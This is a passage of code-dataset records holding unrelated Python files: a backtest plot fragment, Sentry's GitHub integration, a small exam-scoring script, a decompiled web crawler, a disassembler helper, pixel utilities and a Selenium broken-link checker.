df_trx_temp.index\n\n plt.figure(figsize = (10, 8))\n plt.plot(tic_plot, color='g', lw=2.)\n plt.plot(tic_plot, '^', markersize=10, color='m', label = 'buying signal', markevery = buying_signal)\n plt.plot(tic_plot, 'v', markersize=10, color='k', label = 'selling signal', markevery = selling_signal)\n plt.title(f\"{df_trx_temp.name} Num Transactions: {len(buying_signal[buying_signal==True]) + len(selling_signal[selling_signal==True])}\")\n plt.legend()\n plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=25)) \n plt.xticks(rotation=45, ha='right')\n plt.show()\n","sub_path":"backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81930122","text":"from __future__ import absolute_import\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom sentry import http, options\nfrom sentry.identity.pipeline import IdentityProviderPipeline\nfrom sentry.identity.github import get_user_info\nfrom sentry.integrations import (\n IntegrationInstallation, IntegrationFeatures, IntegrationProvider,\n IntegrationMetadata, FeatureDescription,\n)\nfrom sentry.integrations.exceptions import ApiError\nfrom sentry.integrations.constants import ERR_INTERNAL, ERR_UNAUTHORIZED\nfrom sentry.integrations.repositories import RepositoryMixin\nfrom sentry.models import Repository\nfrom sentry.pipeline import NestedPipelineView, PipelineView\nfrom sentry.tasks.integrations import migrate_repo\nfrom sentry.utils.http import absolute_uri\n\nfrom .client import GitHubAppsClient\nfrom .issues import GitHubIssueBasic\nfrom .repository import GitHubRepositoryProvider\nfrom .utils import get_jwt\n\n\nDESCRIPTION = \"\"\"\nConnect your Sentry organization into your GitHub organization or user account.\nTake a step towards augmenting your sentry issues with commits from your\nrepositories ([using releases](https://docs.sentry.io/learn/releases/)) and\nlinking up your GitHub issues and pull requests directly to issues in Sentry.\n\"\"\"\n\nFEATURES = [\n FeatureDescription(\n \"\"\"\n Create and link Sentry issue groups directly to a GitHub issue or pull\n request in any of your repositories, providing a quick way to jump from\n Sentry bug to tracked issue or PR!\n \"\"\",\n IntegrationFeatures.ISSUE_BASIC,\n ),\n FeatureDescription(\n 
\"\"\"\n Authorize repositories to be added to your Sentry organization to augmenting\n sentry issues with commit data with [deployment\n tracking](https://docs.sentry.io/learn/releases/).\n \"\"\",\n IntegrationFeatures.COMMITS,\n ),\n]\n\ndisable_dialog = {\n 'actionText': 'Visit GitHub',\n 'body': 'Before deleting this integration, you must uninstall this'\n ' integration from GitHub. After uninstalling, your integration will'\n ' be disabled at which point you can choose to delete this'\n ' integration.',\n}\n\nremoval_dialog = {\n 'actionText': 'Delete',\n 'body': 'Deleting this integration will delete all associated repositories'\n ' and commit data. This action cannot be undone. Are you sure you'\n ' want to delete your integration?',\n}\n\nmetadata = IntegrationMetadata(\n description=DESCRIPTION.strip(),\n features=FEATURES,\n author='The Sentry Team',\n noun=_('Installation'),\n issue_url='https://github.com/getsentry/sentry/issues/new?title=GitHub%20Integration:%20&labels=Component%3A%20Integrations',\n source_url='https://github.com/getsentry/sentry/tree/master/src/sentry/integrations/github',\n aspects={\n 'disable_dialog': disable_dialog,\n 'removal_dialog': removal_dialog,\n },\n)\n\nAPI_ERRORS = {\n 404: 'GitHub returned a 404 Not Found error. If this repository exists, ensure'\n ' that your installation has permission to access this repository'\n ' (https://github.com/settings/installations).',\n 401: ERR_UNAUTHORIZED,\n}\n\n\ndef build_repository_query(metadata, name, query):\n account_type = 'user' if metadata['account_type'] == 'User' else 'org'\n return (u'%s:%s %s' % (account_type, name, query)).encode('utf-8')\n\n\nclass GitHubIntegration(IntegrationInstallation, GitHubIssueBasic, RepositoryMixin):\n repo_search = True\n\n def get_client(self):\n return GitHubAppsClient(integration=self.model)\n\n def get_repositories(self, query=None):\n if not query:\n return [{\n 'name': i['name'],\n 'identifier': i['full_name']\n } for i in self.get_client().get_repositories()]\n\n full_query = build_repository_query(self.model.metadata, self.model.name, query)\n response = self.get_client().search_repositories(full_query)\n return [{\n 'name': i['name'],\n 'identifier': i['full_name']\n } for i in response.get('items', [])]\n\n def search_issues(self, query):\n return self.get_client().search_issues(query)\n\n def get_unmigratable_repositories(self):\n accessible_repos = self.get_repositories()\n accessible_repo_names = [r['identifier'] for r in accessible_repos]\n\n existing_repos = Repository.objects.filter(\n organization_id=self.organization_id,\n provider='github',\n )\n\n return filter(\n lambda repo: repo.name not in accessible_repo_names,\n existing_repos,\n )\n\n def reinstall(self):\n self.reinstall_repositories()\n\n def message_from_error(self, exc):\n if isinstance(exc, ApiError):\n message = API_ERRORS.get(exc.code)\n if message:\n return message\n return (\n 'Error Communicating with GitHub (HTTP %s): %s' % (\n exc.code, exc.json.get('message', 'unknown error')\n if exc.json else 'unknown error',\n )\n )\n else:\n return ERR_INTERNAL\n\n def has_repo_access(self, repo):\n client = self.get_client()\n try:\n # make sure installation has access to this specific repo\n # use hooks endpoint since we explicity ask for those permissions\n # when installing the app (commits can be accessed for public repos)\n # https://developer.github.com/v3/repos/hooks/#list-hooks\n client.repo_hooks(repo.config['name'])\n except ApiError:\n return False\n return True\n\n\nclass 
GitHubIntegrationProvider(IntegrationProvider):\n key = 'github'\n name = 'GitHub'\n metadata = metadata\n integration_cls = GitHubIntegration\n features = frozenset([\n IntegrationFeatures.COMMITS,\n IntegrationFeatures.ISSUE_BASIC,\n ])\n\n can_disable = True\n\n setup_dialog_config = {\n 'width': 1030,\n 'height': 1000,\n }\n\n def post_install(self, integration, organization):\n repo_ids = Repository.objects.filter(\n organization_id=organization.id,\n provider__in=['github', 'integrations:github'],\n integration_id__isnull=True,\n ).values_list('id', flat=True)\n\n for repo_id in repo_ids:\n migrate_repo.apply_async(kwargs={\n 'repo_id': repo_id,\n 'integration_id': integration.id,\n 'organization_id': organization.id,\n })\n\n def get_pipeline_views(self):\n identity_pipeline_config = {\n 'oauth_scopes': (),\n 'redirect_url': absolute_uri('/extensions/github/setup/'),\n }\n\n identity_pipeline_view = NestedPipelineView(\n bind_key='identity',\n provider_key='github',\n pipeline_cls=IdentityProviderPipeline,\n config=identity_pipeline_config,\n )\n\n return [GitHubInstallationRedirect(), identity_pipeline_view]\n\n def get_installation_info(self, access_token, installation_id):\n session = http.build_session()\n resp = session.get(\n 'https://api.github.com/app/installations/%s' % installation_id,\n headers={\n 'Authorization': 'Bearer %s' % get_jwt(),\n 'Accept': 'application/vnd.github.machine-man-preview+json',\n }\n )\n resp.raise_for_status()\n installation_resp = resp.json()\n\n resp = session.get(\n 'https://api.github.com/user/installations',\n params={'access_token': access_token},\n headers={'Accept': 'application/vnd.github.machine-man-preview+json'}\n )\n resp.raise_for_status()\n user_installations_resp = resp.json()\n\n # verify that user actually has access to the installation\n for installation in user_installations_resp['installations']:\n if installation['id'] == installation_resp['id']:\n return installation_resp\n\n return None\n\n def build_integration(self, state):\n identity = state['identity']['data']\n\n user = get_user_info(identity['access_token'])\n installation = self.get_installation_info(\n identity['access_token'], state['installation_id'])\n\n integration = {\n 'name': installation['account']['login'],\n # TODO(adhiraj): This should be a constant representing the entire github cloud.\n 'external_id': installation['id'],\n # GitHub identity is associated directly to the application, *not*\n # to the installation itself.\n 'idp_external_id': installation['app_id'],\n 'metadata': {\n # The access token will be populated upon API usage\n 'access_token': None,\n 'expires_at': None,\n 'icon': installation['account']['avatar_url'],\n 'domain_name': installation['account']['html_url'].replace('https://', ''),\n 'account_type': installation['account']['type'],\n },\n 'user_identity': {\n 'type': 'github',\n 'external_id': user['id'],\n 'scopes': [], # GitHub apps do not have user scopes\n 'data': {'access_token': identity['access_token']},\n },\n }\n\n if state.get('reinstall_id'):\n integration['reinstall_id'] = state['reinstall_id']\n\n return integration\n\n def setup(self):\n from sentry.plugins import bindings\n bindings.add(\n 'integration-repository.provider',\n GitHubRepositoryProvider,\n id='integrations:github',\n )\n\n\nclass GitHubInstallationRedirect(PipelineView):\n def get_app_url(self):\n name = options.get('github-app.name')\n return 'https://github.com/apps/%s' % name\n\n def dispatch(self, request, pipeline):\n if 'reinstall_id' in 
request.GET:\n            pipeline.bind_state('reinstall_id', request.GET['reinstall_id'])\n\n        if 'installation_id' in request.GET:\n            pipeline.bind_state('installation_id', request.GET['installation_id'])\n            return pipeline.next_step()\n\n        return self.redirect(self.get_app_url())\n","sub_path":"src/sentry/integrations/github/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":10321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}{"seq_id":"327030498","text":"N = int(input())\n\nresult = input()\nred = [1, 2, 3, 4, 5] * N\nblue = [5, 4, 3, 2, 1] * N\nyellow = [3] * N\n\nscore = {\n    'red': 0,\n    'blue': 0,\n    'yellow': 0\n}\nfor i in range(N):\n    prob = int(result[i])\n    if prob == red[i]:\n        score['red'] += 1\n    if prob == blue[i]:\n        score['blue'] += 1\n    if prob == yellow[i]:\n        score['yellow'] += 1\n\nmax_correct = max(score.values())\nprint(max_correct)\nfor student in [k for k, v in score.items() if v == max_correct]:\n    print(student)","sub_path":"3주차/이상민/[브루트포스]시험.py","file_name":"[브루트포스]시험.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}{"seq_id":"18593155","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /home/aitjcize/Work/creepy/creepy/crawler.py\n# Compiled at: 2016-04-24 02:58:44\nfrom __future__ import print_function\nimport os, re, sys\nfrom threading import Thread, Lock\nif sys.version_info < (3, 0):\n    import httplib\n    from urllib import quote\nelse:\n    import http.client as httplib\n    from urllib.parse import quote\n\nclass Document(object):\n\n    def __init__(self, res, url):\n        self.url = url\n        self.query = '' if '?' 
not in url else url.split('?')[(-1)]\n self.status = res.status\n self.text = res.read()\n self.headers = dict(res.getheaders())\n if sys.version_info >= (3, 0):\n self.text = self.text.decode()\n\n\nclass Crawler(object):\n F_ANY, F_SAME_DOMAIN, F_SAME_HOST, F_SAME_PATH = list(range(4))\n\n def __init__(self):\n self.host = None\n self.visited = {}\n self.targets = set()\n self.threads = []\n self.concurrency = 0\n self.max_outstanding = 16\n self.max_depth = 0\n self.include_hashtag = False\n self.follow_mode = self.F_SAME_HOST\n self.content_type_filter = '(text/html)'\n self.url_filters = []\n self.prefix_filter = '^(#|javascript:|mailto:)'\n self.targets_lock = Lock()\n self.concurrency_lock = Lock()\n return\n\n def set_content_type_filter(self, cf):\n self.content_type_filter = '(%s)' % ('|').join(cf)\n\n def add_url_filter(self, uf):\n self.url_filters.append(uf)\n\n def set_follow_mode(self, mode):\n if mode > 5:\n raise RuntimeError('invalid follow mode.')\n self.follow_mode = mode\n\n def set_concurrency_level(self, level):\n self.max_outstanding = level\n\n def set_max_depth(self, max_depth):\n self.max_depth = max_depth\n\n def set_include_hashtag(self, include):\n self.include_hashtag = include\n\n def process_document(self, doc):\n print('GET', doc.status, doc.url)\n\n def crawl(self, url, path=None):\n self.root_url = url\n rx = re.match('(https?://)([^/]+)([^\\\\?]*)(\\\\?.*)?', url)\n self.proto = rx.group(1)\n self.host = rx.group(2)\n self.path = rx.group(3)\n self.dir_path = os.path.dirname(self.path)\n self.query = rx.group(4)\n if path:\n self.dir_path = path\n self.targets.add(url)\n self._spawn_new_worker()\n while self.threads:\n try:\n for t in self.threads:\n t.join(1)\n if not t.isAlive():\n self.threads.remove(t)\n\n except KeyboardInterrupt:\n sys.exit(1)\n\n def _url_domain(self, host):\n parts = host.split('.')\n if len(parts) <= 2:\n return host\n else:\n if re.match('^[0-9]+(?:\\\\.[0-9]+){3}$', host):\n return host\n return ('.').join(parts[1:])\n\n def _follow_link(self, url, link):\n if re.search(self.prefix_filter, link):\n return\n else:\n for f in self.url_filters:\n if re.search(f, link):\n return\n\n if not self.include_hashtag:\n link = re.sub('(%23|#).*$', '', link)\n rx = re.match('(https?://)([^/:]+)(:[0-9]+)?([^\\\\?]*)(\\\\?.*)?', url)\n url_proto = rx.group(1)\n url_host = rx.group(2)\n url_port = rx.group(3) if rx.group(3) else ''\n url_path = rx.group(4) if len(rx.group(4)) > 0 else '/'\n url_dir_path = os.path.dirname(url_path)\n rx = re.match('((https?://)([^/:]+)(:[0-9]+)?)?([^\\\\?]*)(\\\\?.*)?', link)\n link_full_url = rx.group(1) is not None\n link_proto = rx.group(2) if rx.group(2) else url_proto\n link_host = rx.group(3) if rx.group(3) else url_host\n link_port = rx.group(4) if rx.group(4) else url_port\n link_path = quote(rx.group(5), '/%') if rx.group(5) else url_path\n link_query = quote(rx.group(6), '?=&%') if rx.group(6) else ''\n link_dir_path = os.path.dirname(link_path)\n if not link_full_url and not link.startswith('/'):\n link_path = os.path.normpath(os.path.join(url_dir_path, link_path))\n link_url = link_proto + link_host + link_port + link_path + link_query\n if self.follow_mode == self.F_ANY:\n return link_url\n if self.follow_mode == self.F_SAME_DOMAIN:\n if self._url_domain(self.host) == self._url_domain(link_host):\n return link_url\n return\n if self.follow_mode == self.F_SAME_HOST:\n if self.host == link_host:\n return link_url\n return\n if self.follow_mode == self.F_SAME_PATH:\n if self.host == link_host and 
link_dir_path.startswith(self.dir_path):\n return link_url\n else:\n return\n\n return\n\n def _calc_depth(self, url):\n return len(url.replace('https', 'http').replace(self.root_url, '').rstrip('/').split('/')) - 1\n\n def _add_target(self, target):\n if not target:\n return\n if self.max_depth and self._calc_depth(target) > self.max_depth:\n return\n with self.targets_lock:\n if target in self.visited:\n return\n self.targets.add(target)\n\n def _spawn_new_worker(self):\n with self.concurrency_lock:\n self.concurrency += 1\n t = Thread(target=self._worker, args=(self.concurrency,))\n t.daemon = True\n self.threads.append(t)\n t.start()\n\n def _worker(self, sid):\n while self.targets:\n try:\n with self.targets_lock:\n url = self.targets.pop()\n self.visited[url] = True\n rx = re.match('(https?)://([^/]+)(.*)', url)\n protocol = rx.group(1)\n host = rx.group(2)\n path = rx.group(3)\n if protocol == 'http':\n conn = httplib.HTTPConnection(host, timeout=10)\n else:\n conn = httplib.HTTPSConnection(host, timeout=10)\n conn.request('GET', path)\n res = conn.getresponse()\n if res.status == 404:\n continue\n if res.status == 301 or res.status == 302:\n rlink = self._follow_link(url, res.getheader('location'))\n self._add_target(rlink)\n continue\n try:\n if not re.search(self.content_type_filter, res.getheader('Content-Type')):\n continue\n except TypeError:\n continue\n\n doc = Document(res, url)\n self.process_document(doc)\n links = re.findall('href\\\\s*=\\\\s*[\\'\"]\\\\s*([^\\'\"]+)[\\'\"]', doc.text, re.S)\n links = list(set(links))\n for link in links:\n rlink = self._follow_link(url, link.strip())\n self._add_target(rlink)\n\n if self.concurrency < self.max_outstanding:\n self._spawn_new_worker()\n except KeyError:\n break\n except (httplib.HTTPException, EnvironmentError):\n with self.targets_lock:\n self.targets.add(url)\n\n with self.concurrency_lock:\n self.concurrency -= 1","sub_path":"pycfiles/creepy_crawly-0.1.0-py3-none-any/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":7735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"389549113","text":"from struct import *\nfrom GlobalModel import GlobalModel as gm\nfrom Utils import *\nfrom mnemonic.Mnemonic import Mnemonic\n\nclass Sub(Mnemonic):\n\n @staticmethod\n def execute(pc, text, mnemonic):\n\n if mnemonic == 0x812e: # sub [1234], #1234\n addr, = unpack('<H', text[2:4])\n val, = unpack('<H', text[4:6])\n Sub.printInst(pc, convNum(text, 6), '['+hex(addr)+']', val)\n pcInc = 6\n elif mnemonic == 0x802e: # sub byte [1234], #12\n addr, = unpack('<H', text[2:4])\n val, = unpack('<B', text[4])\n Sub.printInst(pc, convNum(text, 5), '['+hex(addr)+']', val)\n pcInc = 5\n else:\n raise Exception(\"unknown register name specified\")\n\n return pcInc\n \n @staticmethod\n def printInst(pc, raw, target, val):\n inst = 'sub %s, %04x' % (target, val)\n printInst(pc, raw, inst)\n\n","sub_path":"v6-86/tutorial/work8/7run/mnemonic/reverse/Sub.py","file_name":"Sub.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609468821","text":"\r\nimport sys\r\nimport math\r\n\r\n\r\n# returns Boolean, Boolean, brightness value\r\n# first boolean is color change\r\n# second boolean is within brightness threshold value\r\n# third value is actual brightness change value\r\ndef compute_appearance_difference(orig_pix, comp_pix, brit_thres, clr_thres=None, get_values=None):\r\n\r\n if 
not clr_thres:\r\n color_ch_threshold = 10\r\n else:\r\n color_ch_threshold = clr_thres\r\n \r\n if type(orig_pix) is dict and type(comp_pix) is dict:\r\n red_difference = orig_pix['r'] - comp_pix['r']\r\n green_difference = orig_pix['g'] - comp_pix['g']\r\n blue_difference = orig_pix['b'] - comp_pix['b']\r\n \r\n elif type(orig_pix) is tuple and type(comp_pix) is tuple:\r\n red_difference = orig_pix[0] - comp_pix[0]\r\n green_difference = orig_pix[1] - comp_pix[1]\r\n blue_difference = orig_pix[2] - comp_pix[2] \r\n\r\n \r\n if red_difference >= 0:\r\n if green_difference >= 0:\r\n rg_diff = abs( red_difference - green_difference )\r\n else:\r\n # red_difference is 0 or positive, green_difference is negative\r\n rg_diff = abs(green_difference) + red_difference\r\n \r\n if blue_difference >= 0:\r\n # red_difference is 0 or positive, blue_difference is also 0 or positive\r\n rb_diff = abs( red_difference - blue_difference )\r\n else:\r\n # red_difference is 0 or positive, blue_difference is negative\r\n rb_diff = abs(blue_difference) + red_difference\r\n else:\r\n if green_difference >= 0:\r\n # red_difference is negative and green_difference is 0 or positive\r\n rg_diff = abs(red_difference) + green_difference\r\n else:\r\n # red_difference is negative and green_difference is negative\r\n rg_diff = abs( red_difference - green_difference )\r\n \r\n if blue_difference >= 0:\r\n # red_difference is negative and blue_difference is 0 or positive\r\n rb_diff = abs(red_difference) + blue_difference\r\n else:\r\n # red_difference is negative and blue_difference is negative\r\n rb_diff = abs( red_difference - blue_difference )\r\n \r\n \r\n if green_difference >= 0:\r\n if blue_difference >= 0:\r\n gb_diff = abs( green_difference - blue_difference )\r\n else:\r\n # green_difference is 0 or positive and blue_difference is negative\r\n gb_diff = abs(blue_difference) + green_difference\r\n else:\r\n if blue_difference >= 0: \r\n # green_difference is negative and blue_difference is 0 or positive\r\n gb_diff = abs(green_difference) + blue_difference\r\n else:\r\n # green_difference is negative and blue_difference is negative\r\n gb_diff = abs( green_difference - blue_difference )\r\n\r\n \r\n clr_change = rg_diff + rb_diff + gb_diff\r\n\r\n \r\n # this should be applied only if color change did not happen. average brightness change\r\n average_britch = ( abs(red_difference) + abs(green_difference) + abs(blue_difference) ) / 3 \r\n \r\n if get_values:\r\n return clr_change, average_britch\r\n \r\n if clr_change <= color_ch_threshold :\r\n if average_britch <= brit_thres:\r\n # color stayed and brightness is within threshold value\r\n return False, True, average_britch\r\n else:\r\n # color stayed but not within threshold value\r\n return False, False, average_britch\r\n \r\n\r\n # color changed\r\n return True, None, None\r\n\r\n\r\n\r\n\r\n# in parameters\r\n# param_pixel -> string\r\n# image size contains width and height\r\n# returns list of pixel indexes as integer\r\ndef get_nbr_pixels(param_pixel, image_size, convert2xy=False, input_xy=False):\r\n\r\n # list for storing neighbor index numbers\r\n neighbors = []\r\n \r\n\r\n # assigning the positions for comparing neighbor pixels. 
starting with top going clockwise.\r\n ignore_neighbor_position_dict = { 'top' : False, 'top_right' : False, 'right' : False, 'bottom_right': False, 'bottom': False, 'bottom_left' : False, 'left': False, 'top_left': False }\r\n\r\n if input_xy is False:\r\n param_pixel = int( param_pixel )\r\n x = param_pixel % image_size[0]\r\n y = math.floor(param_pixel / image_size[0])\r\n\r\n elif input_xy is True:\r\n x = param_pixel[0]\r\n y = param_pixel[1]\r\n \r\n \r\n # determining if the current pixel is the leftmost pixel\r\n # no need to compare with top left, left, bottom left\r\n if x == 0:\r\n \r\n ignore_neighbor_position_dict['top_left'] = True\r\n ignore_neighbor_position_dict['left'] = True\r\n ignore_neighbor_position_dict['bottom_left'] = True\r\n \r\n # determing the first row\r\n # no need to compare with top left, top, top right\r\n if y == 0:\r\n ignore_neighbor_position_dict['top_left'] = True\r\n ignore_neighbor_position_dict['top'] = True\r\n ignore_neighbor_position_dict['top_right'] = True \r\n\r\n # determining the rightmost pixel. x counts from 0 to width - 1\r\n # no need to compare with top right, right, bottom right\r\n if x == image_size[0] - 1:\r\n ignore_neighbor_position_dict['top_right'] = True\r\n ignore_neighbor_position_dict['right'] = True\r\n ignore_neighbor_position_dict['bottom_right'] = True\r\n\r\n # determining last row . y counts from 0 to height - 1\r\n # no need to compare with bottom left, bottom, bottom right\r\n if y == image_size[1] - 1:\r\n ignore_neighbor_position_dict['bottom_left'] = True\r\n ignore_neighbor_position_dict['bottom'] = True\r\n ignore_neighbor_position_dict['bottom_right'] = True\r\n\r\n if ignore_neighbor_position_dict['top'] == False: \r\n if input_xy is False:\r\n top_neighbor = param_pixel - image_size[0]\r\n elif input_xy is True:\r\n top_neighbor = ( x, y - 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(top_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( top_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n\r\n\r\n if ignore_neighbor_position_dict['top_right'] == False: \r\n if input_xy is False: \r\n top_right_neighbor = param_pixel - image_size[0] + 1\r\n elif input_xy is True:\r\n top_right_neighbor = ( x + 1, y - 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(top_right_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( top_right_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n \r\n\r\n\r\n if ignore_neighbor_position_dict['right'] == False: \r\n if input_xy is False:\r\n right_neighbor = param_pixel + 1\r\n elif input_xy is True:\r\n right_neighbor = ( x + 1, y )\r\n \r\n if convert2xy is False:\r\n neighbors.append(right_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( right_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n \r\n\r\n if ignore_neighbor_position_dict['bottom_right'] == False:\r\n if input_xy is False:\r\n bottom_right_neighbor = param_pixel + image_size[0] + 1\r\n elif input_xy is True:\r\n bottom_right_neighbor = ( x + 1, y + 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(bottom_right_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( bottom_right_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n \r\n\r\n if ignore_neighbor_position_dict['bottom'] == False:\r\n if input_xy is False:\r\n bottom_neighbor = param_pixel + image_size[0]\r\n elif input_xy is True:\r\n bottom_neighbor = ( x, y + 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(bottom_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( bottom_neighbor, image_size[0] )\r\n 
neighbors.append( xy )\r\n\r\n\r\n if ignore_neighbor_position_dict['bottom_left'] == False: \r\n if input_xy is False: \r\n bottom_left_neighbor = param_pixel + image_size[0] - 1\r\n elif input_xy is True:\r\n bottom_left_neighbor = ( x - 1, y + 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(bottom_left_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( bottom_left_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n\r\n if ignore_neighbor_position_dict['left'] == False:\r\n if input_xy is False: \r\n left_neighbor = param_pixel - 1\r\n elif input_xy is True:\r\n left_neighbor = ( x - 1, y )\r\n \r\n if convert2xy is False:\r\n neighbors.append(left_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( left_neighbor, image_size[0] )\r\n neighbors.append( xy )\r\n\r\n if ignore_neighbor_position_dict['top_left'] == False:\r\n if input_xy is False:\r\n top_left_neighbor = param_pixel - image_size[0] - 1\r\n elif input_xy is True:\r\n top_left_neighbor = ( x - 1, y - 1 )\r\n \r\n if convert2xy is False:\r\n neighbors.append(top_left_neighbor)\r\n else:\r\n xy = convert_pindex_to_xy( top_left_neighbor, image_size[0] )\r\n neighbors.append( xy ) \r\n\r\n return neighbors\r\n\r\n \r\n\r\n\r\n# input parameters\r\n# xy -> ( 190, 30 )\r\n# vicinity_value is how many pixels for the pixel to be expanded.\r\n# image_size -> image_size[0] is image width, image_size[1] is image height\r\ndef get_vicinity_pixels( xy, vicinity_value, image_size ):\r\n\r\n vicinity_pixels = [xy]\r\n \r\n for expanded_value in range( 1, vicinity_value + 1 ):\r\n # add if pixel is out of range of image size\r\n no_need2add = []\r\n \r\n upLeft = ( xy[0] - expanded_value , xy[1] - expanded_value )\r\n upRight = ( xy[0] + expanded_value , xy[1] - expanded_value )\r\n downRight = ( xy[0] + expanded_value , xy[1] + expanded_value )\r\n downLeft = ( xy[0] - expanded_value , xy[1] + expanded_value )\r\n\r\n if xy[1] - expanded_value < 0:\r\n no_need2add.append('up')\r\n if xy[0] + expanded_value >= image_size[0]:\r\n no_need2add.append('right')\r\n if xy[1] + expanded_value >= image_size[1]:\r\n no_need2add.append('down')\r\n if xy[0] - expanded_value < 0:\r\n no_need2add.append('left')\r\n \r\n if \"up\" not in no_need2add:\r\n # if up is in no_need2add, then no need to add any of the up pixels at all.\r\n for upL2upR in range( upLeft[0] + 1, upRight[0] ):\r\n # keep addng pixel to the right until upRight x.\r\n # as I move to the right, make sure that pixel is within the image width and expanded upLeft is within image width\r\n if upL2upR < image_size[0] and upL2upR >= 0:\r\n vicinity_pixels.append( ( upL2upR, upLeft[1] ) )\r\n \r\n if \"right\" not in no_need2add:\r\n # if right is in no_need2add, then there is no need to add any of the pixels between \"up right to down right\" at all.\r\n for upR2downR in range( upRight[1] + 1, downRight[1] ):\r\n # y + upR2downR.\r\n # as I move down, make sure that the pixel is still within the image height and upRight is within image height\r\n if upR2downR < image_size[1] and upR2downR >= 0:\r\n\r\n vicinity_pixels.append( ( upRight[0], upR2downR ) )\r\n \r\n if \"down\" not in no_need2add:\r\n for downL2downR in range( downLeft[0] + 1, downRight[0] ):\r\n # x + downL2downR\r\n if downL2downR < image_size[0] and downL2downR >= 0:\r\n vicinity_pixels.append( ( downL2downR, downLeft[1] ) )\r\n \r\n if \"left\" not in no_need2add:\r\n for upL2downL in range( upLeft[1] + 1, downLeft[1] ):\r\n # y + upL2downL\r\n if upL2downL < image_size[1] and upL2downL >= 0:\r\n 
vicinity_pixels.append( ( upLeft[0], upL2downL ) )\r\n\r\n \r\n return vicinity_pixels\r\n\r\n\r\n# pixel_xy -> ( x, y ) x and y are both integers\r\ndef get_pixel_im_area(pixel_xy, image_areas):\r\n # im_area -> one image area. example -> {1: {'left': 0, 'right': 71, 'top': 0, 'bottom': 40}}\r\n for im_area in image_areas:\r\n # im_area_lrtb -> image area's left right top bottom. {'left': 0, 'right': 71, 'top': 0, 'bottom': 40}\r\n for im_area_lrtb in im_area.values():\r\n # check if pixel's x position is between the current image area's left and right values\r\n if pixel_xy[0] >= im_area_lrtb[\"left\"] and pixel_xy[0] <= im_area_lrtb[\"right\"]:\r\n # check if pixel's y position is between the current image area's top and bottom values\r\n if pixel_xy[1] >= im_area_lrtb[\"top\"] and pixel_xy[1] <= im_area_lrtb[\"bottom\"]:\r\n \r\n return im_area\r\n\r\n \r\n print(\"ERROR at pixel_functions.get_pixel_im_area. pixel_xy has to be in one of the image areas\" )\r\n sys.exit()\r\n\r\n\r\n\r\n# xy -> ( x, y ) x and y are integers\r\n# return pixel_index. pixel_index is integer\r\ndef convert_xy_to_pindex( xy, im_width ):\r\n pixel_index = xy[1] * im_width + xy[0]\r\n \r\n return pixel_index\r\n\r\ndef convert_pindex_to_xy( pindex, im_width ):\r\n y = math.floor( int(pindex) / im_width)\r\n x = int(pindex) % im_width \r\n\r\n return ( x,y )\r\n\r\n\r\n\r\n\r\n# get pixels positions in pixel coordinate and not image coordinate\r\n#\r\n# pixels -> { (x,y), ... } or list of xy\r\n# \r\n# shapes_colors is the one returned by get_all_shapes_colors\r\n# \r\n# returns list of (x,y). [ ( x,y ), ... ]\r\n# x,y and r,g,b are all integers\r\ndef get_pixels_pos_in_pix_coord( pixels ): \r\n \r\n smallest_x = min( [ xy[0] for xy in pixels ] )\r\n smallest_y = min( [ xy[1] for xy in pixels ] )\r\n\r\n pixel_coords = [ (xy[0] - smallest_x, xy[1] - smallest_y ) for xy in pixels ]\r\n\r\n return pixel_coords\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"libraries/pixel_functions.py","file_name":"pixel_functions.py","file_ext":"py","file_size_in_byte":13503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"394043869","text":"from selenium import webdriver\nimport os\nimport requests\n\n\ndef test_links(links):\n for link in links:\n request = requests.get(link)\n if request.status_code != 200:\n print('Found bad URL: ' + link)\n print('Code: ' + str(request.status_code))\n return\n print('No broken URLs!')\n\n\ndef test_dewey():\n root_dir = os.getcwd()\n utils_dir = os.path.abspath(root_dir + \"/../utils/\")\n driver = webdriver.Chrome(executable_path=utils_dir + '/chromedriver')\n\n driver.get(\"https://kyledewey.github.io/\")\n links_elements = driver.find_elements_by_tag_name('a')\n\n links = list(map(lambda e: e.get_attribute('href'), links_elements))\n\n test_links(links)\n\n driver.quit()\n\n\nif __name__ == '__main__':\n test_dewey()\n","sub_path":"src/test_prof_dewey.py","file_name":"test_prof_dewey.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 